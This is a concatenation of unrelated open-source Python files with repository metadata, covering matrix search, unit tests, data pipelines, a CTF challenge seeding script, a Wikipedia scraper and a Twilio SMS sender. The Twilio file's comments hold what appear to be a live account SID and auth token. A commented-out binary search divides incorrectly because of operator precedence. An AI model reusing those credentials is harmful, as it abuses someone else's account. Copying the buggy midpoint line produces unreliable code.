31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from typing import List
# Solution 1
def searchMatrix(matrix: List[List[int]], target: int) -> bool:
cur_col, cur_row = len(matrix[0]) - 1, 0
while cur_col >= 0 and cur_row < len(matrix):
if matrix[cur_row][cur_col] > target:
cur_col -= 1
elif matrix[cur_row][cur_col] < target:
cur_row += 1
else:
return True
return False
# Solution 2
# def searchMatrix(matrix: List[List[int]], target: int)-> bool:
# m, n = len(matrix), len(matrix[0])
#
# for row in matrix:
#
# # range check
# if row[0] <= target <= row[-1]:
#
# # launch binary search on current possible row
#
# left, right = 0, n - 1
#
# while left <= right:
#
# mid = left + (right - left) >> 1
#
# mid_value = row[mid]
#
# if target > mid_value:
# left = mid + 1
# elif target < mid_value:
# right = mid - 1
# else:
# return True
#
# return False
| 25.809524 | 64 | 0.479705 |
f136cb09a267ce07c92ec9a4012ff1753bf15377
| 3,466 |
py
|
Python
|
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | 1 |
2020-03-30T18:34:33.000Z
|
2020-03-30T18:34:33.000Z
|
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | null | null | null |
halfint_test.py
|
mark-caprio/am
|
e2c715513ca1b9df98e71b78084914f00a50f8dc
|
[
"MIT"
] | 3 |
2019-02-24T20:23:16.000Z
|
2019-08-09T02:14:45.000Z
|
"""Provide Python port of halfint_test.cpp unit tests.
Language: Python 3
Mark A. Caprio
University of Notre Dame
05/17/20 (mac): Created.
06/26/20 (mac): Finish converting tests. Add dict key test.
"""
import am
if (__name__=="__main__"):
# // HalfInt arithmetic tests
# std::cout << HalfInt(3) << " " << HalfInt(3,1) << " " << HalfInt(3,2) << std::endl;
# std::cout << TwiceValue(HalfInt(3,2)) << std::endl;
# std::cout << std::max(HalfInt(5,2),HalfInt(1,2)) << std::endl;
# std::cout << std::min(HalfInt(5,2),HalfInt(1,2)) << std::endl;
# std::cout << HalfInt(-1,2) << " -> " << abs(HalfInt(-1,2)) << std::endl;
# std::cout << HalfInt(7,2) << " -> " << abs(HalfInt(7,2)) << std::endl;
# std::cout << -HalfInt(1,2) << std::endl;
# std::cout << HalfInt(1)+HalfInt(1,2) << std::endl;
# std::cout << 0+HalfInt(1,2) << std::endl;
# std::cout << 1+HalfInt(1,2) << std::endl;
# //std::cout << "double... " << 1.0 + DValue(HalfInt(1,2)) << std::endl;
# std::cout << "double... " << 1.0 + double(HalfInt(1,2)) << std::endl;
# std::cout << "****" << std::endl;
# // should cause compiler failure:
# // std::cout << "fallacious but lucky... 1.0 + HalfInt(1,2) = " << 1.0 + HalfInt(1,2) << std::endl;
# // std::cout << "fallacious and not lucky... 0.5 + HalfInt(1,2) = " << 0.5 + HalfInt(1,2) << std::endl;
# // std::cout << "****" << std::endl;
print("{} {}".format(am.HalfInt(3),am.HalfInt(3,2)))
print("{} {}".format(am.TwiceValue(am.HalfInt(3,2)),am.HalfInt(3,2).TwiceValue()))
print("{}".format(max(am.HalfInt(5,2),am.HalfInt(1,2))))
print("{}".format(min(am.HalfInt(5,2),am.HalfInt(1,2))))
print("{} {}".format(am.HalfInt(-1,2),abs(am.HalfInt(-1,2))))
print("{} {}".format(am.HalfInt(7,2),abs(am.HalfInt(7,2))))
print("{}".format(-am.HalfInt(1,2)))
print("{}".format(am.HalfInt(1)+am.HalfInt(1,2)))
print("{} {}".format(0+am.HalfInt(1,2),1+am.HalfInt(1,2)))
print("{}".format(1.0+float(am.HalfInt(1,2))))
try:
print("{}".format(1.0+am.HalfInt(1,2)))
except TypeError as e:
print(e)
# // invalid denominator
# // std::cout << HalfInt(7,4) << std::endl; // causes throw
try:
print("{}".format(am.HalfInt(7,4)))
except ValueError as e:
print(e)
# // integer truncation
# std::cout << int(HalfInt(4,2)) << " " << int(HalfInt(3,2)) << " " << int(HalfInt(-3,2)) << std::endl;
print("{} {} {}".format(int(am.HalfInt(4,2)),int(am.HalfInt(3,2)),int(am.HalfInt(-3,2))))
# // hat arithmetic
# std::cout << Hat(HalfInt(1,2)) << " " << Hat(1) << std::endl;
print("{} {}".format(am.Hat(am.HalfInt(1,2)),am.Hat(1)))
# // parity sign
# std::cout << ParitySign(-1) << std::endl;
print("{} {}".format(am.ParitySign(-1),am.ParitySign(am.HalfInt(-2,2))))
# // complex phase
# std::cout << Phase(HalfInt(1,2)) << std::endl;
print("{}".format(am.Phase(am.HalfInt(1,2))))
# // hashing
# std::cout << "hash " << HalfInt(1,2).Str() << " " << hash_value(HalfInt(1,2)) << " "
# << HalfInt(22,2).Str() << " " << hash_value(HalfInt(22,2)) << std::endl;
# std::cout << "****" << std::endl;
print("{} {}".format(am.HalfInt(1,2).__hash__(),am.HalfInt(22,2).__hash__()))
# Python: HalfInt as dict key
d = {am.HalfInt(1,2): 999}
print("{} {}".format(d,d[am.HalfInt(1,2)]))
| 39.386364 | 109 | 0.525389 |
7418152193c9bec0825044c0d6dc3cc35aad42ca
| 2,094 |
py
|
Python
|
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-pipeline-kernel/src/watchmen_pipeline_kernel/pipeline/monitor_log_invoker.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from asyncio import ensure_future, run
from logging import getLogger
from typing import Callable
from watchmen_auth import PrincipalService
from watchmen_data_kernel.meta import TopicService
from watchmen_data_kernel.topic_schema import TopicSchema
from watchmen_model.admin import PipelineTriggerType, TopicKind
from watchmen_model.pipeline_kernel import PipelineMonitorLog, PipelineTriggerTraceId
from watchmen_pipeline_kernel.common import PipelineKernelException
from .pipeline_trigger import PipelineTrigger
logger = getLogger(__name__)
def get_topic_service(principal_service: PrincipalService) -> TopicService:
return TopicService(principal_service)
def find_topic_schema(name: str, principal_service: PrincipalService) -> TopicSchema:
schema = get_topic_service(principal_service).find_schema_by_name(name, principal_service.get_tenant_id())
if schema is None:
raise PipelineKernelException(
f'Topic schema[name={name}, tenant={principal_service.get_tenant_id()}] not found.')
return schema
def create_monitor_log_pipeline_invoker(
trace_id: PipelineTriggerTraceId, principal_service: PrincipalService
) -> Callable[[PipelineMonitorLog, bool], None]:
def handle_monitor_log(monitor_log: PipelineMonitorLog, asynchronized: bool) -> None:
# trigger pipeline or log by monitor log
# find the trigger topic
topic_id = monitor_log.topicId
topic_service = get_topic_service(principal_service)
topic = topic_service.find_by_id(topic_id)
if topic is None or topic.kind == TopicKind.SYSTEM:
# will not trigger monitor log pipelines again
logger.info(monitor_log)
else:
schema = find_topic_schema('raw_pipeline_monitor_log', principal_service)
trigger = PipelineTrigger(
trigger_topic_schema=schema,
trigger_type=PipelineTriggerType.INSERT,
trigger_data=monitor_log.dict(),
trace_id=trace_id,
principal_service=principal_service,
asynchronized=asynchronized,
handle_monitor_log=handle_monitor_log
)
if asynchronized:
ensure_future(trigger.invoke())
else:
run(trigger.invoke())
return handle_monitor_log
| 36.736842 | 107 | 0.815186 |
741d6794c1ebfa61b7c121ee6bec65d1b0d65313
| 1,320 |
py
|
Python
|
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | 1 |
2021-11-02T20:53:58.000Z
|
2021-11-02T20:53:58.000Z
|
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
3kCTF/2021/web/pawnshop/apache/elastic_init.py
|
ruhan-islam/ctf-archives
|
8c2bf6a608c821314d1a1cfaa05a6cccef8e3103
|
[
"MIT"
] | null | null | null |
from elasticsearch import Elasticsearch
import random
import string
def id_generator(size=6, chars=string.ascii_lowercase+ string.digits):
return ''.join(random.choice(chars) for _ in range(size))
es_client = Elasticsearch(['http://172.30.0.7:9200'])
FLAG = '3k{*REDACTED*}'
entries=[]
entries.append({"id":1,"picture":"axe.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Memory leak Axe","value":id_generator(10)})
entries.append({"id":2,"picture":"drill.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"SUID drill","value":id_generator(10)})
entries.append({"id":3,"picture":"rifle.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"ROP rifle","value":id_generator(10)})
entries.append({"id":4,"picture":"bullets.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Syscall bullets","value":id_generator(10)})
entries.append({"id":5,"picture":"flag.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"Flag","value":FLAG})
entries.append({"id":6,"picture":"hammer.png","seller":id_generator()+"@pawnshop.2021.3k.ctf.to","item":"0day hammer","value":id_generator(10)})
body = []
for entry in entries:
body.append({'index': {'_id': entry['id']}})
body.append(entry)
response = es_client.bulk(index='pawnshop', body=body)
print(response)
| 47.142857 | 149 | 0.70303 |
74420c44a41363e56423cd99a1dba7e259be2177
| 1,666 |
py
|
Python
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 10 |
2020-03-20T19:14:43.000Z
|
2020-10-29T21:31:40.000Z
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 41 |
2020-03-20T20:27:55.000Z
|
2020-03-24T21:49:37.000Z
|
backend/utils/validate_json.py
|
methodpark/digitaleswarten
|
024c0b88df54e9727925b202e139b3c5b2ce73d6
|
[
"Apache-2.0"
] | 1 |
2020-03-21T09:31:51.000Z
|
2020-03-21T09:31:51.000Z
|
from flask import abort
from jsonschema import validate, ValidationError
def has_json_header(request):
"""
Checks if a request contains json content.
Throws 400 otherwise.
"""
if 'application/json' not in request.headers['Content-Type']:
abort(400)
def validate_format(data, schema):
if not set(data.keys()) == set(schema['properties'].keys()):
raise ValidationError('')
def validate_schema(data, schema):
try:
validate(data, schema=schema)
validate_format(data, schema=schema)
return True
except ValidationError:
return False
def validate_places_post(data):
schema = {
'type': 'object',
'properties':
{
'placeName': {'type': 'string'},
},
}
return validate_schema(data, schema)
def validate_queues_post(data):
schema = {
'type': 'object',
'properties':
{
'queueName': {'type': 'string'},
},
}
return validate_schema(data, schema)
def validate_entries_post(data):
schema = {
'type': 'object',
'properties':
{
'name': {'type': 'string'},
},
}
return validate_schema(data, schema)
def validate_entry_state_set(data):
schema = {
'type': 'object',
'properties':
{
'state': {'type': 'string'},
},
}
return validate_schema(data, schema)
def validate_put_name_storage(data):
schema = {
'type': 'object',
'properties':
{
'nameStorage': {'type': 'boolean'},
},
}
return validate_schema(data, schema)
| 20.825 | 65 | 0.558223 |
748e9dc6f0fa26d6c661380be2faa7d242d2ef9f
| 440 |
py
|
Python
|
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
nnc/migrations/0003_product_description.py
|
JanakiRaman-2002/Arre-yaar
|
c0b44ca1f8884a09116241dcd0bf7cfcee3b785d
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.2 on 2021-07-31 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nnc', '0002_auto_20210729_1145'),
]
operations = [
migrations.AddField(
model_name='product',
name='description',
field=models.CharField(default='Product', max_length=100),
preserve_default=False,
),
]
| 22 | 70 | 0.604545 |
247144267cc3a246754d8f4568bea346b485f116
| 4,370 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/loader/pipelines/segmentation.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-03-07T10:51:21.000Z
|
2022-03-07T10:51:21.000Z
|
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from PIL import Image
import copy
import cv2
from ..registry import PIPELINES
@PIPELINES.register()
class MultiRestrictSize(object):
def __init__(self,
min_size=None,
max_size=800,
flip=False,
multi_scale=[1.3]):
self.min_size = min_size
self.max_size = max_size
self.multi_scale = multi_scale
self.flip = flip
assert ((min_size is None)) or ((max_size is None))
def __call__(self, sample):
samples = []
image = sample['current_img']
h, w = image.shape[:2]
for scale in self.multi_scale:
# Fixed range of scales
sc = None
# Align short edge
if not (self.min_size is None):
if h > w:
short_edge = w
else:
short_edge = h
if short_edge > self.min_size:
sc = float(self.min_size) / short_edge
else:
if h > w:
long_edge = h
else:
long_edge = w
if long_edge > self.max_size:
sc = float(self.max_size) / long_edge
if sc is None:
new_h = h
new_w = w
else:
new_h = sc * h
new_w = sc * w
new_h = int(new_h * scale)
new_w = int(new_w * scale)
if (new_h - 1) % 16 != 0:
new_h = int(np.around((new_h - 1) / 16.) * 16 + 1)
if (new_w - 1) % 16 != 0:
new_w = int(np.around((new_w - 1) / 16.) * 16 + 1)
if new_h == h and new_w == w:
samples.append(sample)
else:
new_sample = {}
for elem in sample.keys():
if 'meta' in elem:
new_sample[elem] = sample[elem]
continue
tmp = sample[elem]
if 'label' in elem:
new_sample[elem] = sample[elem]
continue
else:
flagval = cv2.INTER_CUBIC
tmp = cv2.resize(tmp,
dsize=(new_w, new_h),
interpolation=flagval)
new_sample[elem] = tmp
samples.append(new_sample)
if self.flip:
now_sample = samples[-1]
new_sample = {}
for elem in now_sample.keys():
if 'meta' in elem:
new_sample[elem] = now_sample[elem].copy()
new_sample[elem]['flip'] = True
continue
tmp = now_sample[elem]
tmp = tmp[:, ::-1].copy()
new_sample[elem] = tmp
samples.append(new_sample)
return samples
@PIPELINES.register()
class MultiNorm(object):
def __call__(self, samples):
for idx in range(len(samples)):
sample = samples[idx]
for elem in sample.keys():
if 'meta' in elem:
continue
tmp = sample[elem]
if tmp is None:
continue
if tmp.ndim == 2:
tmp = tmp[:, :, np.newaxis]
else:
tmp = tmp / 255.
tmp -= (0.485, 0.456, 0.406)
tmp /= (0.229, 0.224, 0.225)
tmp = tmp.transpose((2, 0, 1))
samples[idx][elem] = tmp
return samples
| 33.358779 | 74 | 0.462014 |
56898797571ee91b9705014a4713968199acc5eb
| 3,507 |
py
|
Python
|
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | 2 |
2021-12-16T23:06:48.000Z
|
2022-01-31T04:28:54.000Z
|
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | null | null | null |
self_annotation_test.py
|
pradeep90/annotation_collector
|
49dcbe4de9a40f4efe55495bcb128c03cb46aff2
|
[
"MIT"
] | null | null | null |
import unittest
import libcst as cst
from textwrap import dedent
from typing import List
from self_annotation import methods_with_self_annotation, methods_returning_self
from util import statement_to_string
def get_self_annotations(source: str) -> List[str]:
return [
statement_to_string(method)
for method in methods_with_self_annotation(
cst.parse_module(dedent(source)),
)
]
def get_methods_returning_self(source: str) -> List[str]:
return [
statement_to_string(method)
for method in methods_returning_self(
cst.parse_module(dedent(source)),
)
]
class SelfAnnotationTest(unittest.TestCase):
def test_self_annotation(self) -> None:
self.assertEqual(
get_self_annotations(
"""
class Foo:
def some_method(self: _T, other: Union[_T, str]) -> bool:
print("hello")
def some_classmethod(cls: Type[_T], other: int) -> List[_T]: ...
def self_not_annotated(self, other: Union[_T, str]) -> bool: ...
"""
),
[
"def some_method(self: _T, other: Union[_T, str]) -> bool: ...",
"def some_classmethod(cls: Type[_T], other: int) -> List[_T]: ...",
],
)
self.assertEqual(
get_self_annotations(
"""
class Foo:
def some_method(self, other: Union[_T, str]) -> bool: ...
def some_method2(cls, other: int) -> List[int]: ...
@staticmethod
def some_method2(x: int) -> List[int]: ...
def not_a_method(self: _T, other: Union[_T, str]) -> bool: ...
"""
),
[],
)
def test_returns_self(self) -> None:
self.assertEqual(
get_methods_returning_self(
"""
class Foo:
def some_method(self):
self.x = 1
return self
def some_method2(not_called_self):
self.x = 1
return not_called_self
def some_classmethod(cls, x: int):
print("hello")
return cls(x)
def some_classmethod2(not_called_cls, x: int):
print("hello")
return not_called_cls(x)
def no_return_self(self):
return 1
def no_parameters():
return 1
"""
),
[
"def some_method(self):\n" " self.x = 1\n" " return self",
"def some_method2(not_called_self):\n"
" self.x = 1\n"
" return not_called_self",
"def some_classmethod(cls, x: int):\n"
' print("hello")\n'
" return cls(x)",
"def some_classmethod2(not_called_cls, x: int):\n"
' print("hello")\n'
" return not_called_cls(x)",
],
)
self.assertEqual(
get_methods_returning_self(
"""
def not_a_method(self):
return self
"""
),
[],
)
| 31.881818 | 84 | 0.454234 |
d90d433a44d595d1584ff8bf433f06daa6c6113d
| 994 |
py
|
Python
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 43 |
2019-12-10T00:05:51.000Z
|
2022-03-31T21:21:20.000Z
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 5 |
2021-05-09T01:12:31.000Z
|
2022-03-29T17:34:15.000Z
|
tspdb/src/data/generateHarmonics.py
|
swipswaps/tspdb
|
9c085cef7164c114bb0952519b9715dcfa072b34
|
[
"Apache-2.0"
] | 14 |
2020-01-13T21:20:07.000Z
|
2022-03-31T02:11:26.000Z
|
######################################################
#
# Generate Harmonics data
#
######################################################
import numpy as np
def generate(sineCoeffArray, sinePeriodsArray, cosineCoeffArray, cosinePeriodsArray, timeSteps, tStart = 0):
if (len(sineCoeffArray) != len(sinePeriodsArray)):
raise Exception('sineCoeffArray and sinePeriodsArray must be of the same length.')
if (len(cosineCoeffArray) != len(cosinePeriodsArray)):
raise Exception('cosineCoeffArray and cosinePeriodsArray must be of the same length.')
outputArray = np.zeros(timeSteps)
T = float(timeSteps)
for i in range(tStart, timeSteps):
value = 0.0
for j in range(0, len(sineCoeffArray)):
value += (sineCoeffArray[j] * np.sin(i * sinePeriodsArray[j] * 2.0 * np.pi / T ))
for k in range(0, len(cosineCoeffArray)):
value += (cosineCoeffArray[k] * np.cos(i * cosinePeriodsArray[k] * 2.0 * np.pi / T))
outputArray[i] = value
return outputArray
| 35.5 | 109 | 0.623742 |
794bfb426d52ad43e3e2f35e2437243e352e4c07
| 291 |
py
|
Python
|
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
Flask/FastAPI/Django/Python-API-Development.freeCodeCamp.org/07-Pydantic-Models/schemas.py
|
shihab4t/Software-Development
|
0843881f2ba04d9fca34e44443b5f12f509f671e
|
[
"Unlicense"
] | null | null | null |
from pydantic import BaseModel
from datetime import datetime
class PostBase(BaseModel):
title: str
content: str
published: bool = True
class PostCreate(PostBase):
pass
class Post(PostBase):
id: int
create_at: datetime
class Config:
orm_mode = True
| 13.857143 | 30 | 0.683849 |
30b1168d544597cb161b7ead4d44f5a53a69f27f
| 2,072 |
py
|
Python
|
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | 1 |
2022-01-28T22:29:44.000Z
|
2022-01-28T22:29:44.000Z
|
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | null | null | null |
scripts/wiki-info.py
|
evildrummer/1337-observer
|
621eb16711d9f70a59fb5524fc990dcab1004b14
|
[
"MIT"
] | 1 |
2022-01-28T21:10:41.000Z
|
2022-01-28T21:10:41.000Z
|
import argparse
import requests
from bs4 import BeautifulSoup
import urllib.parse
import re
def main(input_file, output_file):
# use input file
with open(input_file, "r") as myfile:
content = myfile.readlines()
for line in content:
url = get_website(line)
if url :
print(url)
with open(output_file, "a") as out:
out.write(url + "\n")
def get_website(url_path):
try:
clean_url_path = url_path.strip()
print("Start with: " + clean_url_path)
session = requests.session()
session.headers[
"User-Agent"
] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36"
response = session.get(
url="https://de.wikipedia.org" + clean_url_path, timeout=3
)
session.close()
soup = BeautifulSoup(response.text, "html.parser")
url = ""
if soup.find("table"):
if soup.find("table").findAll("a", class_="external text"):
link_elements = soup.find("table").findAll("a", class_="external text")
url = (
link_elements[len(link_elements) - 1].attrs.get("href")
)
if soup.find("table"):
if soup.find("table").findAll("a", class_="external free"):
link_elements = soup.find("table").findAll("a", class_="external free")
url = (
link_elements[len(link_elements) - 1].attrs.get("href")
)
return url
except Exception as e:
print(e)
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Check list of strings against wikipedia."
)
parser.add_argument("-i", type=str, default="input.txt", help="Path to input file")
parser.add_argument(
"-o", type=str, default="output.txt", help="Path to output file"
)
args = parser.parse_args()
main(args.i, args.o)
| 33.967213 | 123 | 0.565637 |
cceb767b76a624c0a5613aa619c966a9f77f41b3
| 581 |
py
|
Python
|
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | null | null | null |
code/selfish_proxy/cli.py
|
simonmulser/master-thesis
|
5ca2ddda377a0eede5a3c50866e0f90292c5448f
|
[
"CC-BY-4.0"
] | 1 |
2019-06-05T09:10:30.000Z
|
2019-06-05T09:10:30.000Z
|
import xmlrpclib
import argparse
server = xmlrpclib.ServerProxy('http://localhost:8000')
def get_best_public_block_hash():
print(server.get_best_public_block_hash())
def get_start_hash():
print(server.get_start_hash())
FUNCTION_MAP = {
'get_best_public_block_hash': get_best_public_block_hash,
'get_start_hash': get_start_hash,
}
parser = argparse.ArgumentParser(description='Execute cli commands against Selfish Mining Proxy.')
parser.add_argument('command', choices=FUNCTION_MAP.keys())
args = parser.parse_args()
func = FUNCTION_MAP[args.command]
func()
| 23.24 | 98 | 0.77969 |
15e3f235200baf05a691bbe46d3344ac787a7e08
| 236 |
py
|
Python
|
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | 1 |
2021-08-16T14:52:05.000Z
|
2021-08-16T14:52:05.000Z
|
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
Problems/Dynamic Programming/Hard/TrappingRainWater/test_trap_rain_water.py
|
dolong2110/Algorithm-By-Problems-Python
|
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from trap_rain_water import trap
class Test(TestCase):
def test_trap(self):
self.assertEqual(trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]), 6)
self.assertEqual(trap([4, 2, 0, 3, 2, 5]), 9)
| 33.714286 | 71 | 0.618644 |
ba53812042c8cd49922e9f56094c01118cb404a8
| 383 |
py
|
Python
|
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
inn_checker/inn_check/migrations/0002_innmodel_ip.py
|
bmu0/inn_checker
|
3c5f736c179af5c3a4bb80a5c403aee0969ea5e9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2022-03-11 06:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inn_check', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='innmodel',
name='IP',
field=models.CharField(default='', max_length=30),
),
]
| 20.157895 | 62 | 0.584856 |
244649b71a831d0866f160585f58c68bfa580954
| 190 |
py
|
Python
|
Backend/tests/test_skeleton.py
|
olivaresf/AWattPrice
|
db50930a016a4263638af64704d3233cc27e142b
|
[
"BSD-3-Clause"
] | 8 |
2020-10-22T14:47:54.000Z
|
2022-01-23T20:17:51.000Z
|
v1_backend/tests/test_skeleton.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 75 |
2020-11-16T16:13:28.000Z
|
2022-03-27T09:45:56.000Z
|
v1_backend/tests/test_skeleton.py
|
sp4c38/AwattarApp
|
b914e8042e5cdcb84485d6d45133a00244662bda
|
[
"BSD-3-Clause"
] | 4 |
2020-11-10T21:21:08.000Z
|
2021-10-20T12:35:33.000Z
|
# -*- coding: utf-8 -*-
import pytest
from awattprice.poll import main
__author__ = "Frank Becker"
__copyright__ = "Frank Becker"
__license__ = "mit"
def test_nothing():
assert True
| 14.615385 | 32 | 0.705263 |
068472b37a923d39eaa69065bcef300bb0c08538
| 635 |
py
|
Python
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python_gui_tkinter/KALU/GARBAGE/SMS/sms.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
# Download the helper library from https://www.twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/console
account_sid = '' #'AC13c16edc8f9f3ae37006470f6a7c4eca' #'AC13c16edc8f9f3ae37006470f6a7c4eca'
auth_token = '' #'5001944d507e84ba1f4809ad9a15858e' #'your_auth_token'
client = Client(account_sid, auth_token)
message = client.messages.create(
body='Hello there This is a test message from twilio!!',
from_='+99098',
to='+8'
)
print(message.sid)
| 35.277778 | 96 | 0.629921 |
ccb7138859e0220beed21a63659d150c9301378b
| 2,697 |
py
|
Python
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Lokpath_Keylight/Scripts/KeylightCreateIssue/KeylightCreateIssue.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
